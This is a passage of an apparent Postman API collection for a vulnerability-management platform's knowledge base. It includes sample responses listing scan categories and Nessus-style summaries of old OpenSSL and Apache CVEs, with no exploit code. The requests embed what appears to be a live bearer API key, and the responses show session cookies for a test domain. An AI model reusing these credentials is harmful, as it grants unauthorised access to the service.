origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0123nqt57gw7871t6nrb9l8v0j310064.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"64b63b6f-ab6d-4270-ba09-c32feca6350e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"title\":\"Web Servers\",\"category_id\":\"5b17d91de12f5e057c39ca9a\"},{\"title\":\"Misc.\",\"category_id\":\"5b17d91de12f5e057c39caba\"},{\"title\":\"SMTP problems\",\"category_id\":\"5b17d91de12f5e057c39cabd\"},{\"title\":\"Service detection\",\"category_id\":\"5b17d91de12f5e057c39cac7\"},{\"title\":\"CGI abuses\",\"category_id\":\"5b17e930e12f5e057c39fa67\"},{\"title\":\"Databases\",\"category_id\":\"5b226ec5e12f5e057c3a2bcf\"},{\"title\":\"Settings\",\"category_id\":\"5b436789e12f5e057c3a88bd\"},{\"title\":\"Windows\",\"category_id\":\"5b43678ae12f5e057c3a88c0\"},{\"title\":\"General\",\"category_id\":\"5b48a6fee12f5edae60cf6e6\"},{\"title\":\"DNS\",\"category_id\":\"5b4f3038e12f5edae60d1bbe\"},{\"title\":\"Port scanners\",\"category_id\":\"5b4f3069e12f5edae60d25dd\"},{\"title\":\"SNMP\",\"category_id\":\"5b4f306be12f5edae60d25de\"},{\"title\":\"RPC\",\"category_id\":\"5b5875afe12f5edae60db271\"},{\"title\":\"Windows : User management\",\"category_id\":\"5b9ab4e2e12f5edae60ffe84\"},{\"title\":\"FTP\",\"category_id\":\"5be1e27ae12f5edae610b456\"},{\"title\":\"Firewalls\",\"category_id\":\"5be9d941e12f5edae610e286\"},{\"title\":\"CISCO\",\"category_id\":\"5c34e124e12f5edae61233d3\"},{\"title\":\"Policy Compliance\",\"category_id\":\"5c802679c569d5745fa2030f\"},{\"title\":\"Denial of Service\",\"category_id\":\"5c80267dc569d5745fa20389\"},{\"title\":\"Default Unix Accounts\",\"category_id\":\"5c80267ec569d5745fa20391\"},{\"title\":\"Netware\",\"category_id\":\"5c80268dc569d5745fa20d2b\"},{\"title\":\"OWASP Top 10\",\"category_id\":\"5cad0edec569d524a08f6d07\"},{\"title\":\"A9 – Using Components with Known Vulnerabilities\",\"category_id\":\"5cad0edec569d524a08f6d08\"},{\"title\":\"A1 – Injection\",\"category_id\":\"5cad0edec569d524a08f6d0e\"},{\"title\":\"A3 – Sensitive Data Exposure\",\"category_id\":\"5cad0edfc569d524a08f6d13\"},{\"title\":\"A8 – Insecure Deserialization\",\"category_id\":\"5cad0edfc569d524a08f6d19\"},{\"title\":\"A10 – Insufficient Logging and Monitoring\",\"category_id\":\"5cad0edfc569d524a08f6d1c\"},{\"title\":\"A2 – Broken Authentication\",\"category_id\":\"5cad0edfc569d524a08f6d20\"},{\"title\":\"A6 – Security Misconfiguration\",\"category_id\":\"5cad0edfc569d524a08f6d25\"},{\"title\":\"A4 – XML External Entities (XXE)\",\"category_id\":\"5cad0edfc569d524a08f6d2a\"},{\"title\":\"A5 – Broken Access Control\",\"category_id\":\"5cad0edfc569d524a08f6d2f\"},{\"title\":\"A7 – Cross-Site Scripting (XSS)\",\"category_id\":\"5cad0edfc569d524a08f6d34\"},{\"title\":\"GF - 1.1 - Definir a Gestão de Fornecedores\",\"category_id\":\"5cd2badcc569d573a2c18682\"},{\"title\":\"GF - 4.1 - Gerenciar Riscos de Dependências Externas\",\"category_id\":\"5cd2badcc569d573a2c18687\"},{\"title\":\"GF - 3.1 - Estabelecer Relações Formais com Fornecedores\",\"category_id\":\"5cd2badcc569d573a2c1868b\"},{\"title\":\"GF - 5.1 - Gerenciar Performance de Entidades Externas\",\"category_id\":\"5cd2badcc569d573a2c18695\"},{\"title\":\"GF - 2.1 - Identificar e Priorizar Dependências Externas\",\"category_id\":\"5cd2badcc569d573a2c18699\"},{\"title\":\"Email addresses\",\"category_id\":\"5ce7cec1c569d52c0f2d5721\"},{\"title\":\"Employers\",\"category_id\":\"5ce7cec1c569d52c0f2d5722\"},{\"title\":\"Geographic locations\",\"category_id\":\"5ce7cec1c569d52c0f2d5723\"},{\"title\":\"Job titles\",\"category_id\":\"5ce7cec1c569d52c0f2d5724\"},{\"title\":\"Names\",\"category_id\":\"5ce7cec1c569d52c0f2d5725\"},{\"title\":\"Phone numbers\",\"category_id\":\"5ce7cec1c569d52c0f2d5726\"},{\"title\":\"Salutations\",\"category_id\":\"5ce7cec1c569d52c0f2d5727\"},{\"title\":\"Social media profiles\",\"category_id\":\"5ce7cec1c569d52c0f2d5728\"},{\"title\":\"IP addresses\",\"category_id\":\"5ce7cec4c569d52c0f2d5738\"},{\"title\":\"Passwords\",\"category_id\":\"5ce7cec4c569d52c0f2d5739\"},{\"title\":\"Password hints\",\"category_id\":\"5ce7cec4c569d52c0f2d573e\"},{\"title\":\"Usernames\",\"category_id\":\"5ce7cec4c569d52c0f2d573f\"},{\"title\":\"Credit status information\",\"category_id\":\"5ce7cec4c569d52c0f2d5746\"},{\"title\":\"Dates of birth\",\"category_id\":\"5ce7cec4c569d52c0f2d5747\"},{\"title\":\"Education levels\",\"category_id\":\"5ce7cec4c569d52c0f2d5748\"},{\"title\":\"Ethnicities\",\"category_id\":\"5ce7cec4c569d52c0f2d5749\"},{\"title\":\"Family structure\",\"category_id\":\"5ce7cec4c569d52c0f2d574a\"},{\"title\":\"Financial investments\",\"category_id\":\"5ce7cec4c569d52c0f2d574b\"},{\"title\":\"Genders\",\"category_id\":\"5ce7cec4c569d52c0f2d574c\"},{\"title\":\"Home ownership statuses\",\"category_id\":\"5ce7cec4c569d52c0f2d574d\"},{\"title\":\"Income levels\",\"category_id\":\"5ce7cec4c569d52c0f2d574e\"},{\"title\":\"Marital statuses\",\"category_id\":\"5ce7cec4c569d52c0f2d574f\"},{\"title\":\"Net worths\",\"category_id\":\"5ce7cec4c569d52c0f2d5750\"},{\"title\":\"Occupations\",\"category_id\":\"5ce7cec4c569d52c0f2d5751\"},{\"title\":\"Personal interests\",\"category_id\":\"5ce7cec4c569d52c0f2d5752\"},{\"title\":\"Physical addresses\",\"category_id\":\"5ce7cec4c569d52c0f2d5753\"},{\"title\":\"Religions\",\"category_id\":\"5ce7cec4c569d52c0f2d5754\"},{\"title\":\"Spoken languages\",\"category_id\":\"5ce7cec4c569d52c0f2d5755\"},{\"title\":\"Website activity\",\"category_id\":\"5ce7cec4c569d52c0f2d575e\"},{\"title\":\"Ubuntu Local Security Checks\",\"category_id\":\"5cec232ec569d52c0f2e2561\"},{\"title\":\"Gain a shell remotely\",\"category_id\":\"5cec232ec569d52c0f2e2565\"},{\"title\":\"CentOS Local Security Checks\",\"category_id\":\"5cec232ec569d52c0f2e256f\"},{\"title\":\"SuSE Local Security Checks\",\"category_id\":\"5cec233fc569d52c0f2e2d08\"},{\"title\":\"AIX Local Security Checks\",\"category_id\":\"5cec236ec569d52c0f2e3cd0\"},{\"title\":\"CGI abuses : XSS\",\"category_id\":\"5cec239dc569d52c0f2e4cd4\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":3,\"totalElements\":72,\"last\":false,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":72,\"size\":30,\"number\":0}"}],"_postman_id":"5bcc1440-507b-4af4-b2ce-5109b2929e23"},{"name":"Category by ID","id":"25acfb59-a543-453f-b219-406b6476b854","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/knowledge-base/categories/<category_id>","description":"<p>This endpoint allows you to retrieve a single Category, specifying its ID. If there is no active Category with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","categories","<category_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"adcc49a4-d6ba-474b-b103-80b7f3b99324","name":"Get a Category","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/knowledge-base/categories/5b17d91de12f5e057c39ca9a"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:04:16 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0123nqt57gw7871t6nrb9l8v0j310064.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0tvoc78m4ij5r1pftfuyewtuiq10065.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=51932b7a-5ae4-4252-ac69-bf9ae4dc71d3;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0tvoc78m4ij5r1pftfuyewtuiq10065.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"51932b7a-5ae4-4252-ac69-bf9ae4dc71d3","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"title\":\"Web Servers\",\"category_id\":\"5b17d91de12f5e057c39ca9a\"}"},{"id":"16775923-6093-46ed-9b82-ae3cf2c31ff7","name":"Try to get a wrong Category","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/knowledge-base/categories/5b17d91de12f5e0000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:04:39 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0tvoc78m4ij5r1pftfuyewtuiq10065.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node07h2olhobqn9e1273mpqb96cxf10066.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=f9fdf6b8-5ecd-427c-a3ac-4bf23137bbcd;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node07h2olhobqn9e1273mpqb96cxf10066.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"f9fdf6b8-5ecd-427c-a3ac-4bf23137bbcd","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"25acfb59-a543-453f-b219-406b6476b854"}],"id":"0b9f4e23-549f-4d36-8b96-0db752268d9c","_postman_id":"0b9f4e23-549f-4d36-8b96-0db752268d9c","description":""},{"name":"KB Vulnerability","item":[{"name":"KB Vulnerabilities","id":"a8477c2c-635e-40de-bf6a-6f748d6f6180","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/vulnerabilities?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active KB Vulnerabilities on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 KB Vulnerabilities on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","vulnerabilities"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"0bc68071-5acb-41e7-860d-58290e6a7062","name":"Get the first 30 KB Vulnerabilities","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/vulnerabilities?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","vulnerabilities"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:41:39 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node040cygxidd72j1e0oegx0oj7wh10014.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=00982bac-9c6c-4cd9-ba9c-fbbf8befc3be;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node040cygxidd72j1e0oegx0oj7wh10014.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"00982bac-9c6c-4cd9-ba9c-fbbf8befc3be","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zh X509_ATTRIBUTE Memory Leak DoS\",\"description\":\"\\nAccording to its banner, the remote host is running a version of OpenSSL 0.9.8 prior to 0.9.8zh. It is, therefore, affected by a flaw in the ASN1_TFLG_COMBINE implementation in file tasn_dec.c related to handling malformed X509_ATTRIBUTE structures. A remote attacker can exploit this to cause a memory leak by triggering a decoding failure in a PKCS#7 or CMS application, resulting in a denial of service.\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20151203.txt\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf2c569d5025016dc74\"],\"kb_id\":\"5d024cf2c569d5025016dc75\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"87219\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zb Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8zb. The OpenSSL library is, therefore, affected by the following vulnerabilities :\\n\\n  - A memory double-free error exists related to handling     DTLS packets that allows denial of service attacks.\\n    (CVE-2014-3505)\\n\\n  - An unspecified error exists related to handling DTLS     handshake messages that allows denial of service attacks     due to large amounts of memory being consumed.\\n    (CVE-2014-3506)\\n\\n  - A memory leak error exists related to handling     specially crafted DTLS packets that allows denial of     service attacks. (CVE-2014-3507)\\n\\n  - An error exists related to 'OBJ_obj2txt' and the pretty     printing 'X509_name_*' functions which leak stack data,     resulting in an information disclosure. (CVE-2014-3508)\\n\\n  - A NULL pointer dereference error exists related to     handling anonymous ECDH cipher suites and crafted     handshake messages that allow denial of service attacks     against clients. (CVE-2014-3510)\",\"severity\":3,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/vulnerabilities.html\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/secadv/20140806.txt\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/openssl-0.9.8-notes.html\\n\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf2c569d5025016dc72\"],\"kb_id\":\"5d024cf2c569d5025016dc73\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"77086\"}]},{\"language\":\"en\",\"title\":\"Apache 2.2.x < 2.2.12 Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the version of Apache 2.2.x. running on the remote host is prior to 2.2.12. It is, therefore, affected by the following vulnerabilities :\\n\\n  - A heap-based buffer underwrite flaw exists in the     function 'apr_strmatch_precompile()' in the bundled copy     of the APR-util library, which could be triggered when     parsing configuration data to crash the daemon.\\n    (CVE-2009-0023)\\n\\n  - A flaw in the mod_proxy_ajp module in version 2.2.11     only may allow a remote attacker to obtain sensitive     response data intended for a client that sent an     earlier POST request with no request body.\\n    (CVE-2009-1191)\\n\\n  - The server does not limit the use of directives in a     .htaccess file as expected based on directives such     as 'AllowOverride' and 'Options' in the configuration     file, which could enable a local user to bypass     security restrictions. (CVE-2009-1195)\\n\\n  - Failure to properly handle an amount of streamed data     that exceeds the Content-Length value allows a remote     attacker to force a proxy process to consume CPU time     indefinitely when mod_proxy is used in a reverse proxy     configuration. (CVE-2009-1890)\\n\\n  - Failure of mod_deflate to stop compressing a file when     the associated network connection is closed may allow a     remote attacker to consume large amounts of CPU if     there is a large (>10 MB) file available that has     mod_deflate enabled. (CVE-2009-1891)\\n\\n  - Using a specially crafted XML document with a large     number of nested entities, a remote attacker may be     able to consume an excessive amount of memory due to     a flaw in the bundled expat XML parser used by the     mod_dav and mod_dav_svn modules. (CVE-2009-1955)\\n\\n  - There is an off-by-one overflow in the function     'apr_brigade_vprintf()' in the bundled copy of the     APR-util library in the way it handles a variable list     of arguments, which could be leveraged on big-endian     platforms to perform information disclosure or denial     of service attacks. (CVE-2009-1956)\\n\\nNote that Nessus has relied solely on the version in the Server response header and did not try to check for the issues themselves or even whether the affected modules are in use.\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"cves\":[\"5c80268cc569d5745fa20d22\",\"5cec2343c569d52c0f2e2df8\",\"5cec2343c569d52c0f2e2e09\",\"5c802681c569d5745fa204e2\",\"5c802686c569d5745fa20cdc\"],\"cwes\":[\"5c80268cc569d5745fa20d22\",\"5cec2343c569d52c0f2e2df8\",\"5cec2343c569d52c0f2e2e09\",\"5c802681c569d5745fa204e2\",\"5c802686c569d5745fa20cdc\"],\"recommendation\":[\"5d024cf2c569d5025016dc6a\"],\"kb_id\":\"5d024cf2c569d5025016dc71\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"40467\"}]},{\"language\":\"en\",\"title\":\"Microsoft Exchange Client Access Server Information Disclosure\",\"description\":\"\\nThe Microsoft Exchange Client Access Server (CAS) is affected by an information disclosure vulnerability. A remote, unauthenticated attacker can exploit this vulnerability to learn the server's internal IP address.\",\"severity\":2,\"categories\":[\"5b43678ae12f5e057c3a88c0\"],\"references\":[{\"url\":\"http://foofus.net/?p=758\",\"title\":\"foofus.net\"}],\"recommendation\":[\"5d024cf2c569d5025016dc68\"],\"kb_id\":\"5d024cf2c569d5025016dc69\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"77026\"}]},{\"language\":\"en\",\"title\":\"Check Point SecuRemote Hostname Information Disclosure\",\"description\":\"\\nSending a query to the Check Point SecuRemote service can be used to obtain the hostnames of the firewall and the logging or management station.  In some environments this may be considered sensitive information that an attacker could obtain and use to mount further attacks.\",\"severity\":0,\"categories\":[\"5be9d941e12f5edae610e286\"],\"references\":[{\"url\":\"http://www.nessus.org/u?ec13da59\\n\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.nessus.org/u?f4dd7eff\",\"title\":\"www.nessus.org\"}],\"kb_id\":\"5d024cf2c569d5025016dc67\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"58409\"}]},{\"language\":\"en\",\"title\":\"Apache 2.2.x < 2.2.14 Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.14. It is, therefore, potentially affected by multiple vulnerabilities :\\n\\n  - Faulty error handling in the Solaris pollset support     could lead to a denial of service. (CVE-2009-2699)\\n\\n  - The 'mod_proxy_ftp' module allows remote attackers to     bypass intended access restrictions. (CVE-2009-3095)\\n\\n  - The 'ap_proxy_ftp_handler' function in     'modules/proxy/proxy_ftp.c' in the 'mod_proxy_ftp'     module allows remote FTP servers to cause a     denial of service. (CVE-2009-3094)\\n\\nNote that the remote web server may not actually be affected by these vulnerabilities as Nessus did not try to determine whether the affected modules are in use or check for the issues themselves.\",\"severity\":3,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"cves\":[\"5cec2343c569d52c0f2e2e07\",\"5c802686c569d5745fa20cdc\"],\"cwes\":[\"5cec2343c569d52c0f2e2e07\",\"5c802686c569d5745fa20cdc\"],\"references\":[{\"url\":\"http://www.securityfocus.com/advisories/17959\\n\",\"title\":\"www.securityfocus.com\"},{\"url\":\"http://www.nessus.org/u?c34c4eda\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.securityfocus.com/advisories/17947\\n\",\"title\":\"www.securityfocus.com\"},{\"url\":\"http://www.nessus.org/u?e470f137\\n\",\"title\":\"www.nessus.org\"},{\"url\":\"https://issues.apache.org/bugzilla/show_bug.cgi?id=47645\\n\",\"title\":\"issues.apache.org\"}],\"recommendation\":[\"5d024cf2c569d5025016dc64\"],\"kb_id\":\"5d024cf2c569d5025016dc66\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"42052\"}]},{\"language\":\"en\",\"title\":\"OpenSSL < 0.9.8p / 1.0.0b Buffer Overflow\",\"description\":\"\\nAccording to its banner, the remote server is running a version of OpenSSL that is earlier than 0.9.8p / 1.0.0b.\\n\\nIf a TLS server is multithreaded and uses the SSL cache, a remote attacker could trigger a buffer overflow and crash the server or run arbitrary code.\",\"severity\":3,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20101116.txt\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf2c569d5025016dc61\"],\"kb_id\":\"5d024cf2c569d5025016dc63\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"17766\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zf Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8zf. The OpenSSL library is, therefore, affected by the following vulnerabilities :\\n\\n  - A use-after-free condition exists in the     d2i_ECPrivateKey() function due to improper processing     of malformed EC private key files during import. A     remote attacker can exploit this to dereference or free     already freed memory, resulting in a denial of service     or other unspecified impact. (CVE-2015-0209)\\n\\n  - An invalid read flaw exists in the ASN1_TYPE_cmp()     function due to improperly performed boolean-type     comparisons. A remote attacker can exploit this, via a     crafted X.509 certificate to an endpoint that uses the     certificate-verification feature, to cause an invalid     read operation, resulting in a denial of service.\\n    (CVE-2015-0286)\\n\\n  - A flaw exists in the ASN1_item_ex_d2i() function due to     a failure to reinitialize 'CHOICE' and 'ADB' data     structures when reusing a structure in ASN.1 parsing.\\n    This allows a remote attacker to cause an invalid write     operation and memory corruption, resulting in a denial     of service. (CVE-2015-0287)\\n\\n  - A NULL pointer dereference flaw exists in the     X509_to_X509_REQ() function due to improper processing     of certificate keys. This allows a remote attacker, via     a crafted X.509 certificate, to cause a denial of     service. (CVE-2015-0288)\\n\\n  - A NULL pointer dereference flaw exists in the PKCS#7     parsing code due to incorrect handling of 